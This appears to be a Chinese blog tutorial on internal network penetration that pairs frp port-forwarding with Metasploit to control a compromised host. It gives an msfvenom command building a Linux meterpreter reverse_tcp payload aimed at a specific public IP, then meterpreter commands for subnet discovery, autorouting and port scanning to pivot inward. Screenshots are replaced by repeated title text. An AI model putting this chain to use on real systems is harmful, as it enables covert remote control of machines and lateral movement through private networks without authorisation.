內網滲透-FRP+MSF

宣告: 嚴禁用作非法目的,謝絕一切形式的轉載。

在這裡對介紹瞭如何透過frp進行內網穿透。本篇 文章將frp與MSF結合起來,實現獲取被入侵機器(“肉雞”)的控制權。

網路拓撲

內網滲透-FRP+MSF

透過家庭kali主機,獲取到肉雞的meterpreter。

frp配置

frps

frp伺服器端配置檔案frps。ini如下:

內網滲透-FRP+MSF

使用了dashboard。透過dashboard可以檢視frp伺服器的狀態。

內網滲透-FRP+MSF

執行frps

。/frps -c frps。ini

frpc

frp客戶端配置檔案frpc。ini如下:

內網滲透-FRP+MSF

執行frpc

。/frpc -c frpc。ini

MSF

生成木馬

透過如下命令生成木馬,注意這裡的

LHOST是公網的ip,LPORT是上面frpc.ini的remote_port

。這是最重要的地方。

msfvenom -a x64 ——platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=47。92。90。25 LPORT=7002 -i 3 -f elf -o test_7002

獲取meterpreter

內網滲透-FRP+MSF

注意這裡的lhost是local

ip即127。0。0。1、lport是local

port即5555。這裡是埠進行了轉發。

獲取路由資訊

run get_local_subnets

內網滲透-FRP+MSF

自動新增路由

run post/multi/manage/autoroute

內網滲透-FRP+MSF

檢視路由資訊

run autoroute -p

內網滲透-FRP+MSF

注意這裡的閘道器是session 1。

掃描開放的埠

使用auxiliary/scanner/portscan/tcp模組進行埠掃描。

內網滲透-FRP+MSF

這些掃描大多數的噢沒有nmap強大,但是nmap在這裡不能直接使用,需要設定socks代理,後續文章會詳細介紹如何透過nmap進行掃描。

資料流

在“肉雞”出檢視7002埠的資料流。

內網滲透-FRP+MSF

在Kali中檢視ip=47。92。90。25的資料流。

內網滲透-FRP+MSF

公眾號

更多內容,歡迎關注我的微信公眾號:無情劍客。

內網滲透-FRP+MSF